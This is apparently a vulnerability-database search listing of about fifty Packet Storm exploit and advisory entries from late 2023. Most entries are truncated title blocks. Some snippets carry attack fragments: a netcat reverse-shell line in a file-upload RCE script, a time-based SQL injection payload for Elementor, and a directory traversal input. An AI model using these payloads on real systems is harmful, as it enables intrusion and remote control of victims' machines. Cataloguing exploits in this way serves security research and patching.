50738 matches found

Packet Storm
added 2023/12/04 12:0 a.m., 312 views

GaatiTrack Courier Management System 1.0 SQL Injection

Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection Date: 13/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.mayurik.com/ Software Link: https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php...

7.4 AI score, 0.01092 EPSS
Exploits: 3
Packet Storm
added 2023/12/04 12:0 a.m., 326 views

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure Vendor: R Radio Network Product web page: http://www.pktc.ac.th Affected version: 1.07 Summary: R Radio FM Transmitter that includes FM Exciter and FM Amplifier parameter setup. Desc: The transmitter suffers from an improper acces...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/12/04 12:0 a.m., 372 views

PHPJabbers Time Slots Booking Calendar 4.0 HTML Injection

Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - HTML Injection Date: 13/11/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/ Version: v4.0 Tested on:...

7.4 AI score, 0.00465 EPSS
Exploits: 2
Packet Storm
added 2023/12/01 12:0 a.m., 381 views

WBCE CMS 1.6.1 Shell Upload

Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution Date: 30/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCECMS/archive/refs/tags/1.6.1.zip Version: 1.6.1 Tested on: https://www.softaculous.com/apps/cms/WBCECMS POC: 1...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/12/01 12:0 a.m., 337 views

Kopage Website Builder 4.4.15 Cross Site Scripting

Exploit Title: Kopage Website Builder version 4.4.15 – Stored Cross-Site Scripting XSS Date: 1/12/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.kopage.com/ Version: Version : 4.4.15 Tested on: https://demo.kopage.com/index.php Poc: 1 Install the system through the website and log in...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/11/30 12:0 a.m., 438 views

Online Student Clearance System 1.0 Shell Upload

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

7.5 CVSS, 7.1 AI score, 0.00512 EPSS
Exploits: 4
Packet Storm
added 2023/11/30 12:0 a.m., 419 views

CE Phoenix 1.0.8.20 Remote Code Execution

Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution RCE Authenticated Date: 2023-11-25 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: CE Phoenix Version: v1.0.8.20 Tested on: Softaculous Demo - CE Phoenix EXPLOIT : import requests from bs4 import BeautifulSoup import sys impor...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/11/29 12:0 a.m., 452 views

WordPress Royal Elementor Addons And Templates Remote Shell Upload

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Royal Elementor Addons RCE', 'Description' = %q Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor...

9.8 CVSS, 7 AI score, 0.81695 EPSS
Exploits: 18
Packet Storm
added 2023/11/28 12:0 a.m., 395 views

Loytec L-INX Automation Servers Information Disclosure / Cleartext Secrets

CVE : CVE-2023-46386, CVE-2023-46387, CVE-2023-46388, CVE-2023-46389 + Title : Multiple vulnerabilities in Loytec L-INX Automation Servers + Vendor : LOYTEC electronics GmbH + Affected Products : LINX-151, Firmware 7.2.4, LINX-212, firmware 6.2.4 + Affected Components : L-INX Automation Servers +...

7.4 AI score, 0.01973 EPSS
Exploits: 2
Packet Storm
added 2023/11/28 12:0 a.m., 500 views

SmartNode SN200 3.21.2-23021 OS Command Injection

Advisory ID: SYSS-2023-019 Product: SmartNode SN200 Analog Telephone Adapter ATA & VoIP Gateway Manufacturer: Patton LLC Affected Versions: = 3.21.2-23021 Tested Versions: 2.21.1-22041, 3.21.2-23021, 3.22.0-23083 Vulnerability Type: OS Command Injection CWE-78 Vulnerability Type: Improper Access...

9.8 CVSS, 7.4 AI score, 0.64113 EPSS
Exploits: 3
Packet Storm
added 2023/11/28 12:0 a.m., 367 views

etcd-browser 87ae63d75260 Directory Traversal

An issue was discovered in server.js in etcd-browser 87ae63d75260. By supplying a /../../../ Directory Traversal input to the URL's GET request while connecting to the remote server port specified during setup, an attacker can retrieve local operating system files from the remote system...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/11/28 12:0 a.m., 358 views

Loytec LINX Configurator 7.4.10 Insecure Transit / Cleartext Secrets

CVE : CVE-2023-46383, CVE-2023-46384, CVE-2023-46385 + Title : Multiple vulnerabilities in Loytec LINX Configurator + Vendor : LOYTEC electronics GmbH + Affected Products : LINX Configurator 7.4.10 + Affected Components : LINX Configurator + Discovery Date : 01-Sep-2021 + Publication date :...

7.4 AI score, 0.01522 EPSS
Exploits: 2
Packet Storm
added 2023/11/28 12:0 a.m., 851 views

m-privacy TightGate-Pro Code Execution / Insecure Permissions

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Vulnerabilities product: m-privacy TightGate-Pro vulnerable version: Rolling Release, servers with the following package versions are vulnerable: tightgatevnc...

9.8 CVSS, 7.4 AI score, 0.13467 EPSS
Exploits: 5
Packet Storm
added 2023/11/28 12:0 a.m., 695 views

Fortra Digital Guardian Agent Uninstaller Cross Site Scripting / UninstallKey Cached

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Uninstall Key Caching product: Fortra Digital Guardian Agent Uninstaller Data Loss Prevention vulnerable version: Agent: 7.9.4 fixed version: Agent: 7.9.4 CVE number:...

7.4 AI score, 0.00306 EPSS
Exploits: 2
Packet Storm
added 2023/11/27 12:0 a.m., 336 views

osCommerce 4 Cross Site Scripting

Exploit Title: osCommerce 4 - Reflected XSS Exploit Author: CraCkEr Date: 13/11/2023 Vendor: osCommerce ltd. Vendor Homepage: https://www.oscommerce.com/ Software Link: https://demo.oscommerce.com/ Demo Link: https://demo.oscommerce.com/printshop/ Tested on: Windows 11 Home Impact: Manipulate the...

6.1 CVSS, 7.4 AI score, 0.00805 EPSS
Exploits: 1
Packet Storm
added 2023/11/27 12:0 a.m., 331 views

PopojiCMS 2.0.1 Remote Command Execution

Exploit Title: PopojiCMS Version : 2.0.1 Remote Command Execution Date: 27/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.popojicms.org/ Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip Version: Version : 2.0.1 Tested on:...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/11/27 12:0 a.m., 270 views

CSZ CMS 1.3.0 Remote Command Execution

Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution Date: 17/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.cszcms.com/ Software Link: https://www.cszcms.com/link/3https://sourceforge.net/projects/cszcms/files/latest/download Version: Version 1.3.0 Tested on:...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/11/27 12:0 a.m., 272 views

CE Phoenix 1.0.8.20 Remote Command Execution

Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution RCE Authenticated Date: 2023-11-25 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: CE Phoenix Version: v1.0.8.20 Tested on: Softaculous Demo - CE Phoenix POC: 1. Login to admin panel: - Visit:...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/11/27 12:0 a.m., 265 views

TitanNit Web Control 2.01 / Atemio 7600 Root Remote Command Execution

!/usr/bin/env python -- coding: utf-8 -- TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution Vendor: AAF Digital HD Forum | Atelmo GmbH Product web page: http://www.aaf-digital.info | https://www.atemio.de Affected version: Firmware =2.01 Summary: The Atemio AM 520 HD Full HD...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/11/25 12:0 a.m., 304 views

PyroCMS 3.0.1 Cross Site Scripting

Exploit Title: PyroCMS v3.0.1 - Stored XSS Date: 2023-11-25 Exploit Author: tmrswrr Category : Webapps Vendor Homepage: https://pyrocms.com/ Version: v3.0.1 Tested on: https://www.softaculous.com/apps/cms/PyroCMS...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/11/25 12:0 a.m., 376 views

CSZ CMS 1.3.0 Shell Upload

Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution Date: 23/11/2023 Exploit Author: tmrswrr Vendor Homepage: https://www.cszcms.com/ Software Link: https://www.cszcms.com/link/3https://sourceforge.net/projects/cszcms/files/latest/download Version: Version 1.3.0 Tested on:...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/11/25 12:0 a.m., 279 views

CE Phoenix 1.0.8.20 Cross Site Scripting

Exploit Title: CE Phoenix Version 1.0.8.20 - Stored XSS Date: 2023-11-25 Exploit Author: tmrswrr Category : Webapps Vendor Homepage: https://phoenixcart.org/ Version: v3.0.1 Tested on: https://www.softaculous.com/apps/ecommerce/CEPhoenix POC: 1-Login admin panel , go to this url :...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/11/22 12:0 a.m., 694 views

WordPress UserPro 5.1.x Password Reset / Authentication Bypass / Escalation

Vulnerability Details & Technical Analysis Password Reset to Privilege Escalation using the Sensitive Information Disclosure via Shortcode Description: UserPro = 5.1.1 – Insecure Password Reset Mechanism Affected Plugin: UserPro Plugin Slug: userpro Affected Versions: = 5.1.1 CVE ID: CVE-2023-244...

9.8 CVSS, 8.1 AI score, 0.06801 EPSS
Exploits: 4
Packet Storm
added 2023/11/20 12:0 a.m., 641 views

Jorani Leave Management System 1.0.2 Host Header Injection

Exploit Title: Jorani Leave Management System v1.0.2 Host Header Attack Date: 12/11/2023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://jorani.org/ Software Link: https://github.com/bbalet/jorani/releases/download/v1.0.2/jorani-1.0.2.zip Version: v1.0.2 Tested...

7.5 AI score, 0.00757 EPSS
Exploits: 3
Packet Storm
added 2023/11/20 12:0 a.m., 509 views

FireBear Improved Import And Export 3.8.6 XSLT Server Side Injection

Exploit Title: FireBear Improved Import & Export ver. 3.8.6 for Magento 2.4.6 - XSLT Server Side Injection Command Execution Date: 2023-11-17 Exploit Author: tmrswrr Vendor Homepage: https://commercemarketplace.adobe.com/ Software Link:...

7.5 AI score
Exploits: 0
Packet Storm
added 2023/11/20 12:0 a.m., 470 views

PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting

Exploit Title: Multiple Cross Site Scripting in PHPJabbers Availability Booking Calendar v5.0 Date: 12/11/2023 Exploit Author: BugsBD Security Researcher Orpon Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/availability-booking-calendar/sectionDemo Version:...

7.5 AI score, 0.00499 EPSS
Exploits: 2
Packet Storm
added 2023/11/20 12:0 a.m., 384 views

PHPJabbers Availability Booking Calendar 5.0 CSV Injection

Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - CSV Injection Date: 12/11/2023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/availability-booking-calendar/sectionDemo Version: v5.0...

7.5 AI score, 0.01166 EPSS
Exploits: 3
Packet Storm
added 2023/11/20 12:0 a.m., 424 views

Shuttle Booking Software 2.0 Cross Site Scripting

Exploit Title: Shuttle Booking Software v2.0 - Multiple Stored Cross-Site Scripting Authenticated Date: 09/11/2023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/shuttle-booking-software/ Software Link:...

7.5 AI score, 0.00721 EPSS
Exploits: 3
Packet Storm
added 2023/11/20 12:0 a.m., 414 views

Magento 2.4.6 XSLT Server Side Injection

Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection Date: 2023-11-17 Exploit Author: tmrswrr Vendor Homepage: https://magento2demo.firebearstudio.com/ Software Link: Magento 2.4.6-p3 Version: 2.4.6 Tested on: 2.4.6 POC 1. Enter with admin credentials to this URL:...

7.5 AI score
Exploits: 0
Packet Storm
added 2023/11/20 12:0 a.m., 432 views

GaatiTrack Courier Management System 1.0 Cross Site Scripting

Exploit Title: GaatiTrack Courier Management System v1.0 - Multiple Cross-site scripting Date: 12/112023 Exploit Author: BugsBD Security Researcher Rahad Chowdhury Vendor Homepage: https://www.mayurik.com/ Software Link:...

7.5 AI score, 0.00615 EPSS
Exploits: 3
Packet Storm
added 2023/11/17 12:0 a.m., 390 views

Magento 2.4.6 XSLT Server Side Injection / Command Execution

Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection Date: 2023-11-17 Exploit Author: tmrswrr Vendor Homepage: https://magento2demo.firebearstudio.com/ Software Link: https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip Version: 2.4.6 Tested on: 2.4.6 POC: 1 Enter with adm...

7.5 AI score
Exploits: 0
Packet Storm
added 2023/11/15 12:0 a.m., 594 views

EzViz Studio 2.2.0 DLL Hijacking

PoC: DLL Hijacking via EzViz Studio Reported by EAFZ from Pythongoras Author: EAFZ aka myantti3m CVE: CVE-2023-41613. Test Environment: OS: Windows 11 Pro 64 bit10.0, Build 2261 EzViz Studio version: 2.2.0 Technical Description 1. Technical Description EzvizStudio.exe searches for a DLL called...

7.4 AI score, 0.00451 EPSS
Exploits: 2
Packet Storm
added 2023/11/14 12:0 a.m., 647 views

AjaxPro Deserialization Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'AjaxPro Deserialization Remote Code Execution', 'Description' = %q This module leverages an insecure deserialization of data to get remote code...

9.8 CVSS, 6.9 AI score, 0.88768 EPSS
Exploits: 2
Packet Storm
added 2023/11/14 12:0 a.m., 597 views

F5 BIG-IP TMUI Directory Traversal / File Upload / Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE', 'Description' = %q This module exploits a directory traversal in F5's BIG-IP Traffic...

10 CVSS, 7.3 AI score, 0.99999 EPSS
Exploits: 60
Packet Storm
added 2023/11/14 12:0 a.m., 632 views

F5 BIG-IP TMUI AJP Smuggling Remote Command Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/proto/apachejp' class MetasploitModule 'F5 BIG-IP TMUI AJP Smuggling RCE', 'Description' = %q This module exploits a flaw in F5's BIG-IP Traffic Management...

9.8 CVSS, 7.1 AI score, 0.96515 EPSS
Exploits: 17
Packet Storm
added 2023/11/14 12:0 a.m., 942 views

Apache ActiveMQ Unauthenticated Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apache ActiveMQ Unauthenticated Remote Code Execution', 'Description' = %q This module exploits a deserialization vulnerability in the OpenWire...

10 CVSS, 7.1 AI score, 0.99654 EPSS
Exploits: 31
Packet Storm
added 2023/11/14 12:0 a.m., 939 views

ZoneMinder Snapshots Command Injection

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ZoneMinder Snapshots Command Injection', 'Description' = %q This module exploits an unauthenticated command injection in zoneminder that can be...

9.8 CVSS, 6.9 AI score, 0.80462 EPSS
Exploits: 11
Packet Storm
added 2023/11/14 12:0 a.m., 332 views

EnBw SENEC Legacy Storage Box Log Disclosure

Advisory ID: Ph0s-2023-001 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-284: Improper Access Control Risk Level: CVSS v3.1 Vector:...

6.9 AI score, 0.00963 EPSS
Exploits: 4
Packet Storm
added 2023/11/14 12:0 a.m., 1154 views

Cisco IOX XE Unauthenticated Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco IOX XE Unauthenticated RCE Chain', 'Description' = %q This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable...

10 CVSS, 7.2 AI score, 0.99571 EPSS
Exploits: 27
Packet Storm
added 2023/11/14 12:0 a.m., 730 views

MagnusBilling Remote Command Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/stopwatch' class MetasploitModule 'MagnusBilling application unauthenticated Remote Command Execution.', 'Description' = %q A Command Injection vulnerabilit...

9.8 CVSS, 6.9 AI score, 0.9425 EPSS
Exploits: 15
Packet Storm
added 2023/11/13 12:0 a.m., 344 views

EnBw SENEC Legacy Storage Box Default Credentials

Advisory ID: Ph0s-2023-004 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-1392: Use of Default Credentials Risk Level: CVSS v3.1 Vector:...

7.4 AI score
Exploits: 2
Packet Storm
added 2023/11/13 12:0 a.m., 325 views

Maxima Max Pro Power 1.0 486A BLE Traffic Replay

Exploit Title: Maxima Max Pro Power - BLE Traffic Replay Unauthenticated Date: 13-Nov-2023 Exploit Author: Alok kumar [email protected], Cyberpwn Technologies Pvt. Ltd. Vendor Homepage: https://www.maximawatches.com Product Link: https://www.maximawatches.com/products/max-pro-power Firmware...

7.4 AI score, 0.00511 EPSS
Exploits: 4
Packet Storm
added 2023/11/13 12:0 a.m., 324 views

EnBw SENEC Legacy Storage Box Information Disclosure

Advisory ID: Ph0s-2023-002 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor Risk Level: CVSS v3.1...

7.4 AI score, 0.00963 EPSS
Exploits: 5
Packet Storm
added 2023/11/13 12:0 a.m., 266 views

Travel 1.0 SQL Injection

Title: travel-1.0-by-oretnom23 Multiple-SQLi Author: nu11secur1ty Date: 11/12/2023 Vendor: https://github.com/oretnom23 Software: https://github.com/oretnom23/php-travel-agency-system Reference: https://portswigger.net/web-security/sql-injection Description: The search parameter appears to be...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/11/13 12:0 a.m., 508 views

WordPress Contact Form To Any API 1.1.2 SQL Injection

Exploit Title: WP Plugins Contact Form to Any API = 1.1.2 - SQL Injection Date: 12-11-2023 Exploit Author: Arvandy Software Link: https://wordpress.org/plugins/contact-form-to-any-api/ Vendor Homepage: https://www.itpathsolutions.com/ Version: 1.1.2 Tested on: Windows, Linux CVE: CVE-2023-32741...

7.2 CVSS, 6.9 AI score, 0.00557 EPSS
Exploits: 2
Packet Storm
added 2023/11/13 12:0 a.m., 555 views

EnBw SENEC Legacy Storage Box Exposed Interface

Advisory ID: Ph0s-2023-005 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-923: Improper Restriction of Communication Channel to Intended Endpoints Risk Level:...

7.4 AI score, 0.01077 EPSS
Exploits: 5
Packet Storm
added 2023/11/13 12:0 a.m., 345 views

Penglead 2.0 SQL Injection

Title: penglead-2.0 SQLi-Bypass Authentication Author: nu11secur1ty Date: 11/10/2023 Vendor: https://www.mayurik.com/ Software: https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download Reference: https://portswigger.net/web-security/sql-injection Description: The id...

7.4 AI score
Exploits: 0
Packet Storm
added 2023/11/13 12:0 a.m., 301 views

LOYTEC Electronics Insecure Transit / Insecure Permissions / Unauthenticated Access

CVE : CVE-2023-46380, CVE-2023-46381, CVE-2023-46382 + Title : Multiple vulnerabilities in Loytec LWEB-802, L-INX Automation Servers, L-IOB I/O Controllers, L-VIS Touch Panels + Vendor : LOYTEC electronics GmbH + Affected Products : LINX-212 firmware 6.2.4, LVIS-3ME12-A1 firmware 6.2.2, LIOB-586...

6.9 AI score, 0.07381 EPSS
Exploits: 2
Packet Storm
added 2023/11/13 12:0 a.m., 887 views

Elementor Website Builder SQL Injection

EXPLOIT Elementor Website Builder Replace URL page. On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": code : http://localhost:8080/?test',metakey='key4'where+metaid=SLEEP2; Press "Replace URL" on the Replace URL page. Burp Suit...

7.2 CVSS, 7.4 AI score, 0.19695 EPSS
Exploits: 7
Packet Storm
added 2023/11/13 12:0 a.m., 313 views

EnBw SENEC Legacy Storage Box Hardcoded Credentials

Advisory ID: Ph0s-2023-003 Product: EnBw - SENEC legacy storage box: V1-V3 Manufacturer: SENEC - a part of EnBw Affected Versions: Firmware: all as of 2023-06-19 Tested Versions: current Vulnerability Type: CWE-307: Improper Restriction of Excessive Authentication Attempts CWE-798: Use of...

7 AI score, 0.00963 EPSS
Exploits: 5

Total number of security vulnerabilities: 50738